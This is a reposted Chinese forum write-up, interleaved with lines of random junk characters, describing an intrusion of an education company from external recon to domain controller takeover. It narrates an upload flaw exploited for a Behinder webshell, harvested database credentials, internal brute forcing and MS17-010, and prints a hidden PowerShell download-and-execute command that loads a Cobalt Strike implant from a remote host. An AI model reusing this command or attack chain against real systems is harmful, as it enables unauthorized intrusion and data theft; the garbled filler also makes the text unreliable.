|
7 r/ g9 q" D& |
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
2 X& T# a! F6 d; B1 x
& j. V! Y4 \' _8 s* X! M6 h: Y1 N8 k1 p0 d
% P- J* P* v' r
( d/ \2 \+ c, Q3 l* R" W* f& Z; c2 r6 w9 ]; R+ q
正文$ {) e" H0 c# i/ O
" x1 y3 G$ M/ i4 p6 ~; I* F
" P& G) W* ?. W: W6 f
7 P9 n- Z- Y! F# w g- U
. B, s! S" N& u, @. B6 |/ ]
/ t- ?+ v4 c1 {# g1 g3 ^8 C/ Z 目标:www.xxxx.com(一家教育机构)
7 V7 l3 U, c. c; i) E# D打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能, L) j: Y9 Q6 j' }, ]
2 M8 I5 Z0 g) A
- ^" Y0 b9 I# O: u  ( ~! o. ?! X7 b/ r1 [& w; R9 E
' d( A# L( c L; l) C; t) P. u
- D5 X5 ~5 M) Q/ J! c6 K. T0 X
进行了简单的信息搜集
: x/ d0 ` M5 K: ]
& M1 A& Y( w D- _% D. q
. D% y7 o C" t2 n- h* H4 P+ @ ) m1 b1 {9 {. N! ?/ V' z
. U* K7 E1 Q6 a7 `. a7 x, B
子域名搜集
" @7 d* t$ [/ M/ v% u# i |+ n; @/ C- A( J0 c
/ S, h0 F0 l) h  # w3 K, n, H, h2 j& X& s: f
; x( u6 }" K4 G# N7 d. {8 }0 V
) L S* b4 ^: w) P h fofa找资产
. E4 c1 z2 A4 r2 X
2 M) U' U5 Z- k( a# f; v
9 D% P) F" n( B- q
/ ^; H8 k; }9 E# t! v1 s/ F5 S2 W: F# i. H/ _
/ a! S8 R0 V9 d$ N% U- C5 G% n 3 ^. n7 L/ v* i9 \1 U
# w$ b. b1 h Z4 u" x4 q
一共七个资产。去重之后只有两个。
, R6 J% ^$ y, k1 z" F. v; R
% {3 |5 Q) o; p* X, A+ X/ t7 Y1 Q3 a8 L: U' z$ P& o
. O5 Y/ f9 U+ u$ d3 K4 I. ]7 [, o- x
) I, q2 x% S P% r2 F' ]
目录探测3 S3 F' H4 o& U% `8 x% {+ F
" Y$ g" u" [ ^1 P$ I; g+ d; h& ~! m, D# h$ y
. N# G- Z8 O4 Z$ P) x7 ~
/ i, W/ _* [! l- o4 B D# ]6 ?" L: R) W6 [
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
3 m9 M. S8 D+ r. I5 H1 Q7 }
v7 j w; R' n
/ H2 B8 P7 E% h f/ }5 h. i
2 H' _4 U6 ]% N( f: f0 i, ~: f# L! {& |/ S; o n6 x9 Y. H
我又尝试了通过修改返回包来绕过登录界面
1 o# o, {: H( b P: I
/ e+ {, ^, r) L; k! a% Q
, B: a/ V1 S3 i/ [- j% V  ' d. D; d! r n8 D
/ |7 w+ ~3 a% B( c4 R; N0 F) k3 X$ c" t! }. u( n" ~6 w, U& J6 ~
还是不行,尝试注入无果
' u2 ]$ D7 n0 d+ \ & o/ G( S M& i: `
& Y& Y5 t& D7 d3 U  4 z3 i/ q6 R% c9 r, \ K
; N- R! D$ u6 L( s, [+ Q/ U0 C+ }" ?( d; V
不过我目录探测出了一处Spring信息泄露
+ G+ V5 Z- O& F! ] j* ~
: k9 l/ {7 @; n! V+ L$ `5 F1 r4 e: P
% B, @4 k& n) h& q2 l $ F( Y/ [5 Q, q9 F
/ d* z; x; S& W( F; _7 E
$ m4 p2 R; M( I6 P0 \
, o- ^7 _$ p: W' e' R7 p& W6 N! a, o
尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
, H7 W. q6 O- T0 O% o" b) y; K ) o, u* R/ k" I! `4 Z4 G
" h' y; w4 c K 
5 r8 Y0 ]5 K6 T* O4 e0 | 7 B" }2 ^9 ^6 `' N! `+ _8 ]5 C
% @9 @: ^0 j- T' B
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
3 c& |# J2 P1 {& q' X! z 7 ^# u& W: u5 H
& l9 J, s6 ^3 E( V/ Y 
" j+ T% H7 a: g8 A) V0 P% o+ s/ t
' \% c) G3 t8 ^9 Z& R& b7 G. n6 _+ u
2 @6 B: T1 \3 _ 获取有些师傅到这一步就手机抓包电脑测了。
Y; Z6 n5 @3 M* f 4 \5 j6 l: [9 q/ ~% y. X- }
0 d+ i* ~, U2 ^
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。6 X0 m9 X& p0 }( E' u& n& h% Q
8 C( h* z; N! t* ^5 T& K% T% D5 t( d$ W" K
其中在一个公众号发现了小程序,可以进行注册。
* X N$ @* w7 ]' f& j6 P
1 W9 r5 `+ f8 }7 P; ?+ T; J0 \) A0 s6 T& H& j! C' ?
看到了头像上传,尝试上传获取WebShell
* z9 j- X# D: O* [+ S1 D; E. E' G* {5 _
! q# u+ S0 u; x% J" }: ~3 w5 O* U3 [0 e: b0 s7 N7 G
 ; @! _, R% I4 m* r
! G& H# p) g$ H* O
# A2 @% }- u+ r ~- u! z 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问- {/ X; t1 K+ S* i/ Q, u6 E
1 u) ~2 z3 w0 N5 d' w
6 A2 M+ T) k; k+ ?. O- W. m  , H6 s2 F; G: ` H/ E9 r
4 O8 V# ^# B' Z5 Y+ |% l) q
4 m- P( f0 b2 d! A2 x2 C 然后上了大马
: M3 `" ~' i" p, Q) K4 X * Z+ o. }$ X; ?) J
7 Q& J( O1 O. x" |7 L7 N ] 
+ _& i! `' ~& m1 H$ h
/ B) C0 O1 I) W, @% v$ j; I9 R* [- b4 E' _
+ A u1 Z* s# M6 Q, z7 U" \ ! S3 V# A" Y2 K; C8 ~+ E
7 v& @# y0 d. u4 v 通过翻找文件发现数据库账号密码
$ h; y, g! @2 l8 g) f! {
9 F- [- C% a% Z) j5 y: o& J, \& r, b, Z$ e4 p( c1 K4 m+ t: B5 j
 5 g& q9 A" ?& I8 C% k, [/ N# e
; y' C5 [7 `( l. { o, Q5 m2 K. v! `" v) [( u/ i* Z; }. z1 O
--内网渗透/ \8 v5 V9 `7 M. c# P6 i
8 a, |! x' d' @' Z
; |, K6 _( f M/ X/ q9 _+ r 直接通过powershell执行 cs上线; [4 N6 |3 P1 y$ x- m
* l2 E) I+ |' h7 [# K# Q4 \& {: a
1 `2 ^, ?" D, w' h powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
9 B0 Q3 ]9 \( V9 q. H. i# i
$ L, }, a* U: k4 o; h! M3 w2 @
) J2 |! i% }# \! v! ~  ) M; U }7 v" S
4 K) P- ? e2 d& y0 k
1 |& l8 C* y. m; c& h 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
- H# V$ O3 q F$ f1 K5 D3 E% g % r$ ^ {8 R0 s6 ~8 ~
9 {. Y9 {. _# y: C8 I0 B 
( g% f& H b4 z$ f( ^0 B& n & f5 U9 r7 ?3 v* i7 j% t9 c
% j C- L' C' i2 G; K8 W
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
& n! F4 r2 |$ i* U4 a$ b
2 V* B2 r' T( O
- f$ \8 h) y- i& G% t- v
; i+ A+ u1 x I# Q+ {5 }
, J$ }5 W& X; e" W o
1 T7 M3 J2 {8 b# F7 Q  ! N# C! e4 w& ~
: i8 ~& K7 m e" ~9 R8 N8 }- e: y
2 z9 x& `8 I+ S, I" {/ }
通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
2 c" [0 u! Q& _9 c4 L) B+ l$ }# D
1 x4 X% k" j6 d
; u! v4 t8 B/ N, k# p
- b `$ k! g7 D9 s' L9 D! k
. r2 d2 u b" ?" V
% k0 `- o, s: I, K8 S8 e
, t& F, }6 n5 c0 s8 z1 P% L# q: C7 x0 }
; `* t; l, | x0 P0 q6 Z
( \$ j3 B# q) n( J8 J( r
* a0 @4 r6 I6 y# E* n8 I" G
( D) I8 O; c1 I; ?/ E
* L a' Q- d2 A5 F" [4 O2 O/ B ( B6 B7 B. P* O% c8 I
" u/ m+ b' L9 o3 s2 e
9 q4 m( b9 i) u9 [+ _
小结7 A" r9 b% N$ `' f4 n
$ H: u$ A1 F$ m; Q6 u1 J) |3 R/ I; K
5 U3 Q7 n$ P4 n$ b$ E" [
6 V n: H3 ?) r( y- R- J- l
' Y8 G# k0 k) C( \ m* c |
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
2 w1 T; a, \* T& T 7 {3 h, ~' T' y) L
3 w" @& h4 d; I" w: K! M
% \) d9 C { \ e" ^1 F n
3 {& l4 G6 e( g0 o$ v' V/ @- `% R
% `/ f- W |4 d$ w5 P7 O -
6 v# v5 o3 C% B: ~. u
) X8 v0 R3 M$ K
: x7 g2 R. O; ]6 b - 7 ?8 e2 w; N4 ~% {
+ w5 q3 o3 S/ q
6 Z- @, ?; ^0 ? # M3 |8 Q. b b6 t* B/ o
5 R+ V* s# E. p1 W
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html
$ b5 U) R9 t1 q; x2 B1 A) v4 |
s% a# S. k" }9 R& x! W
0 J& c& u1 Y+ W. R4 d( S! @0 `* M
. |5 H( I: Q" M$ l6 g | 
发表于 2024-3-1 19:41:32
收藏
支持
反对